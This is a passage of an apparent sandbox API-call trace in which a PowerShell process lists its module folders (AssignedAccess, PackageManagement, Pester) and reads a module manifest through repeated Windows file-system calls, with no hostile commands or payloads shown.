(dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.444] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0151.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.444] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.444] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0151.444] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.444] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.444] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0151.445] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0151.445] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.445] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.445] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.445] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0151.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e100) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e0c0) returned 1 [0151.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e150) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e080) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e040) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xafa508deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0151.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xafa508dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0151.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0a0) returned 1 [0151.926] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x59c [0151.926] GetFileType (hFile=0x59c) returned 0x1 [0151.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e010) returned 1 [0151.926] GetFileType (hFile=0x59c) returned 0x1 [0151.926] ReadFile (in: hFile=0x59c, lpBuffer=0x2380036bfd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x2380036bfd0*, lpNumberOfBytesRead=0xafa508e178*=0x5f8, lpOverlapped=0x0) returned 1 [0151.928] ReadFile (in: hFile=0x59c, lpBuffer=0x2380036b508, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x2380036b508*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0151.928] ReadFile (in: hFile=0x59c, lpBuffer=0x2380036bfd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x2380036bfd0*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0151.929] CloseHandle (hObject=0x59c) returned 1 [0151.947] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0151.947] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0151.947] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0151.947] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0151.948] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0151.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0151.948] FindFirstFileW (in: lpFileName="C:\\Program 